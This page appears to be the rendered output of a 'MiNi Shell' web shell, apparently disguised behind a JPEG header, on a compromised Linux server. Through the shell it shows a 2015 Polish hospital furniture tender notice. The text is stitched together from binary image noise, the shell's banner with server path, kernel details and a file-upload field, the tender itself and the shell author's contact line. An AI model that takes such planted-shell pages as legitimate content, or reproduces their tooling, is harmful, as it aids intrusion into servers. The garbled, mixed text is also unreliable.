JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150302/28771-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie, dostarczenie i montaż zabudowy meblowej do modernizowanego budynku A Szpitala Praskiego Sp. z o.o. w ramach realizacji zadania inwestycyjnego: Modernizacja i rozbudowa Szpitala Praskiego</b><br>
<b>Numer ogłoszenia: 28771 - 2015; data zamieszczenia: 02.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Praski p.w. Przemienienia Pańskiego Spółka z ograniczoną odpowiedzialnością , Al. Solidarności 67, 03-401 Warszawa, woj. mazowieckie, tel. 22 6187190, faks 22 6187190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpraski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie, dostarczenie i montaż zabudowy meblowej do modernizowanego budynku A Szpitala Praskiego Sp. z o.o. w ramach realizacji zadania inwestycyjnego: Modernizacja i rozbudowa Szpitala Praskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie, dostarczenie i montaż zabudowy meblowej wykonanej na wymiar i pod potrzeby konkretnych pomieszczeń w asortymencie określony, w  Formularzu Ofertowym stanowiącym Załącznik 1 do niniejszej SIWZ oraz specyfikacji  stanowiącej załącznik 2A do niniejszej SIWZ.  Ilekroć w niniejszej SIWZ mowa jest o meblach rozumie się przez to także blaty, mocowania i wszystkie inne elementy niezbędne do realizacji przedmiotu zamówienia. 

Ustala się następujące etapy realizacji przedmiotu zamówienia:
Etap I - szczegółowe pomiary powierzchni wyposażanych budynku A-Wschód wraz z określeniem szczegółowych projektów aranżacji meblowych
Etap II - dostawa i montaż mebli określonych etapem I
Etap III - szczegółowe pomiary powierzchni wyposażanych budynku A-Zachód wraz z określeniem szczegółowych projektów aranżacji meblowych
Etap IV - dostawa i montaż mebli określonych etapem III
Zamawiający dopuszcza włączenie do etapu III i IV - w razie konieczności wynikłej na skutek doświadczeń z użytkowania powierzchni A-Wschód oraz dokonywanych ostatecznych rotacji oddziałów włączenie do etapów III i IV także prac związanych z uzupełnieniem ostatecznej zabudowy meblowej części A-Wschód

Ilości poszczególnych mebli określone w niniejszym SIWZ nie są dla Zamawiającego wiążące. Zastrzega on sobie prawo - w toku realizacji zamówienia (etap I i II) - dokonywania modyfikacji ilości poszczególnych asortymentów meblowych określonych formularzem ofertowym z zastrzeżeniem, iż ogólna wartość dostarczonych i zamontowanych przez Wykonawcę mebli nie może przekraczać wartości oferty (z zastrzeżeniem postanowień umowy dotyczących ewentualnego udzielenia zamówień uzupełniających). 

Zakres obowiązków Wykonawcy obejmuje między innymi:
a)	Dokonanie we własnym zakresie szczegółowych pomiarów poszczególnych, wskazanych przez Zamawiającego, miejsc montażu mebli i dokonanie we własnym zakresie ewentualnych korekt wymiarów docelowych. Zamawiający dopuszcza dokonanie pomiarów zarówno przed złożeniem oferty (przez wszystkich oferentów) jak i po rozstrzygnięciu postępowania (przez wykonawcę, któremu w wyniku niniejszego postępowania zamówienie zostanie udzielone).  
b)	Wykonanie mebli z materiałów wskazanych w załączniku 2A do niniejszego SIWZ, a w przypadku elementów, których dobór pozostawiono Wykonawcy z materiałów zmywalnych środkami do dezynfekcji powierzchni szpitalnych i dopuszczonego do stosowania w obiektach ochrony zdrowia
c)	Ze względu na możliwość stosowania w Szpitalu procedury dekontaminacji pomieszczeń systemem biodekontaminacji Necospray wykorzystującym środek sterylizujący zawierający m.in. nadtlenek wodoru wykonanie mebli wyłącznie z użyciem  materiałów odpornych na ten środek. 
d)	Wykonanie mebli z materiałów niepalnych, dopuszczonych do stosowania w obiektach użyteczności publicznej
e)	Przedstawienie Zamawiającemu dokumentów potwierdzających wykonanie mebli zgodnie z warunkami określonymi w załączniku A, A1 i 2A 
f)	Wykonanie mebli w jednolitym  kolorze ecru (zbliżonym do Pantone 160 - zgodnie z RGB: 161, 86, 28; oraz CMYK 6, 71, 100, 31) - z zachowaniem zasad dotyczących kolorystyki określonych niniejszym SIWZ. Zamawiający zastrzega sobie prawo dokonania - na etapie I i III realizacji niniejszego przedmiotu zamówienia - ustalenia z Wykonawcą innej kolorystyki mebli (w tym blatów) w poszczególnych pomieszczeniach. 
g)	Montaż mebli  w odpowiednich pomieszczeniach Szpitala w czasie i w sposób określony niniejszym SIWZ z zastrzeżeniem, iż gestorem pomieszczeń jest ich Generalny Wykonawca Budimex SA. (dalej - GW), a na Wykonawcy spoczywa obowiązek ścisłego przestrzegania zasad określonych przez GW i włączonych do Załącznika 2A niniejszego SIWZ. 
h)	Objęcie wykonanych i zamontowanych mebli gwarancją nie krótszą niż 36 miesięcy według zasad określonych w niniejszym SIWZ.
i)	Zamawiający informuje, iż realizacja niniejszego zamówienia publicznego odbywać się będzie w budynku objętym działaniami i dozorem GW zadania Modernizacja i rozbudowa Szpitala Praskiego budynek A.
j)	Zamawiający dysponuje zgodą GW na działania Wykonawcy pod warunkiem zachowania niżej wymienionych zasad i zawarciem w tej kwestii z GW stosownego porozumienia:
I.	Wykonawca przed przystąpieniem do robót przekaże proponowany harmonogram działań, który będzie wymagał akceptacji GW;
II.	Przed przystąpieniem do prac zostanie ustalony zakres ewentualnych robót, które w wyniku działań Wykonawcy będą musiały zostać odtworzone. Wszelkie prace odtworzeniowe zostaną Wykonane na koszt Wykonawcy wraz z udzieleniem na nie gwarancji oraz rękojmi;
III.	Przed przystąpieniem do realizacji przedmiotu zamówienia Wykonawca zapozna wszystkich pracowników z zasadami bezpieczeństwa i poruszania się po terenie budowy określonymi przez GW  i obowiązującymi na terenie placu budowy zgodnie z przyjętą procedurą;
IV.	Przed przystąpieniem do montażu mebli zaleca się sprawdzenie prawidłowości wykonanych przez GW elementów robót budowlanych celem prawidłowego zamontowania i działania elementów objętych przedmiotem zamówienia; 
V.	Wykonawca dokona we własnym zakresie i na własny koszt zabezpieczenia mienia GW oraz wykonanych wcześniej przez GW robót budowlanych, które w toku realizacji przedmiotu zamówienia mogłoby ulec uszkodzeniu; 
VI.	Wykonawca ponosić będzie pełną odpowiedzialność za zatrudnionych przez siebie pracowników i odpowiadać będzie za wyrządzone przez nich szkody;
VII.	Dostawa i montaż elementów stanowiących przedmiot zamówienia odbywać się będzie transportem Wykonawcy na jego koszt i odpowiedzialność w sposób i terminach uzgodnionych z Zamawiającym oraz GW;
VIII.	Po dostarczeniu i zamontowaniu elementów stanowiących przedmiot zamówienia Wykonawca zobowiązany jest do zabezpieczenia ich na swój koszt w sposób uniemożliwiający ich uszkodzenie;
IX.	Wykonawca we własnym zakresie i na własny koszt posprząta udostępnione do realizacji przedmiotu zamówienia pomieszczenia;
X.	Wykonawca przyjmuje do wiadomości, że na uzasadnione polecenie GW Zamawiający ma prawo w każdym czasie do przerwania prac Wykonawcy w przypadku stwierdzenia zagrożenia dla mienia Zamawiającego i lub GW (dotyczy także wykonanych wcześniej przez GW robót budowlanych ). Opóźnienie w realizacji przedmiotu umowy traktowane jest wówczas jako powstałe z winy Wykonawcy;
XI.	W zakresie niniejszego zamówienia Wykonawca przeprowadzi i dokona wszelkich prób elementów stanowiących przedmiot zamówienia. Jeżeli wykonanie prób i/lub rozruchów wymaga wykorzystania urządzeń wykonanych przez GW, a nie przekazanych dotychczas Zamawiającemu, Wykonawca uzyska takie zgody we własnym zakresie;
XII.	Wykonawca odpowiada z tytułu rękojmi i gwarancji jakości za wykonanie elementów stanowiących przedmiot zamówienia oraz za ewentualne instalacje niezbędne do ich prawidłowego działania. Odpowiedzialność gwarancyjna oraz odpowiedzialność z tytułu rękojmi obejmuje instalacje będące przedmiotem zamówienia oraz urządzenia wykonane przez GW konieczne do uruchomienia urządzenia w tym gwarantującymi jego bezproblemowe działanie.

Miejscem realizacji zamówienia: Szpital Praski p.w. Przemienienia Pańskiego Spółka z ograniczoną odpowiedzialnością. Al. Solidarności 67,  03-401  WARSZAWA.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień,  na zasadach określonych w art. 67 ust. 1 pkt 7) ustawy w wysokości maksymalnie 10% zamówienia pierwotnego.
2.	W przypadku zamiaru skorzystania z możliwości udzielenia zamówienia uzupełniającego podstawą ustalenia jego ceny będą ceny jednostkowe określone Formularzu cenowym (Załącznik nr A do SIWZ).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium, na cały okres związania ofertą, 
w następującej wysokości dla całości zamówienia: 20 000,00 zł

2.	Wadium może być wniesione :
a)	w pieniądzu na rachunek Zamawiającego w Banku Gospodarstwa Krajowego I Oddział w Warszawie, nr konta: 96 1130 1017 0020 0760 6720 0002. 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa  w art. 6b ust.5 pkt.2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
(Dz. U. Nr 109, poz. 1158 ze zm.). 

Wadium musi zostać wniesione przed upływem terminu składania ofert, a kopia dowodu (potwierdzona za zgodność z oryginałem przez upoważnionego przedstawiciela Wykonawcy) jego wniesienia dołączona do oferty. 
Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.
W przypadku, gdy Wykonawca wnosi wadium w formach określonych w pkt. 2 lit. b - e, dowód wniesienia wadium nie może być wpięty w sposób trwały do pozostałych stron oferty. Zamawiający zaleca złożenie oryginału dowodu wniesienia wadium w oddzielnej kopercie, w sposób umożliwiający Zamawiającemu jego zwrot w terminach określonych w ustawie. Kopie dowodu wniesienia wadium należy dołączyć do oferty.

3.	Zatrzymanie wadium.	

W przypadku wniesienia wadium w formach określonych w pkt. 2 lit. b - e jw., dokumenty te muszą zawierać określenie przypadków, w których wadium zostaje zatrzymane przez Zamawiającego, tj., kiedy Wykonawca, którego oferta została wybrana:

a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
lub kiedy Wykonawca, który złożył ofertę:

d)	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.

W przypadku wniesienia wadium w formie pieniężnej Zamawiający zatrzymuje wadium (w przypadkach określonych wyżej) wraz z należnymi odsetkami. 

4.     Zwrot wadium.
Zamawiający zwraca wadium na zasadach określonych w art. 46 ustawy.  Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania oferta tego wykonawcy zostanie wybrana jako najkorzystniejsza. W takim przypadku wykonawca zobowiązany będzie do wniesienia wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia nie spełnia, w oparciu o oświadczenie Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - sporządzony według wzoru wykazu stanowiącego Załącznik nr 4  do SIWZ. Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, jeżeli wykaz będzie zawierał co najmniej należycie wykonane dwie dostawy polegające na wykonaniu, dostawie i montażu zabudowy meblowej wykonanej z płyty meblowej w obiekcie ochrony zdrowia w kwocie min. 500 000,00 zł netto;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia nie spełnia, w oparciu o oświadczenie Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia nie spełnia, w oparciu o oświadczenie Wykonawców o spełnieniu warunków udziału w postępowaniu oraz na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą  niż: 500 000,00 zł

informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert na kwotę 500 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalpraski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL PRASKI P.W. PRZEMIENIENIA PAŃSKIEGO
SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Al. Solidarności 67,  03-401  WARSZAWA DZIAŁ ZMAÓWIEŃ PUBLICZNYCH BUDYNEK D POKÓJ 15 płatne 0,30 str.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2015 godzina 10:00, miejsce: SZPITAL PRASKI P.W. PRZEMIENIENIA PAŃSKIEGO
SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ
Al. Solidarności 67,  03-401  WARSZAWA DZIAŁ ZMAÓWIEŃ PUBLICZNYCH BUDYNEK D POKÓJ 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com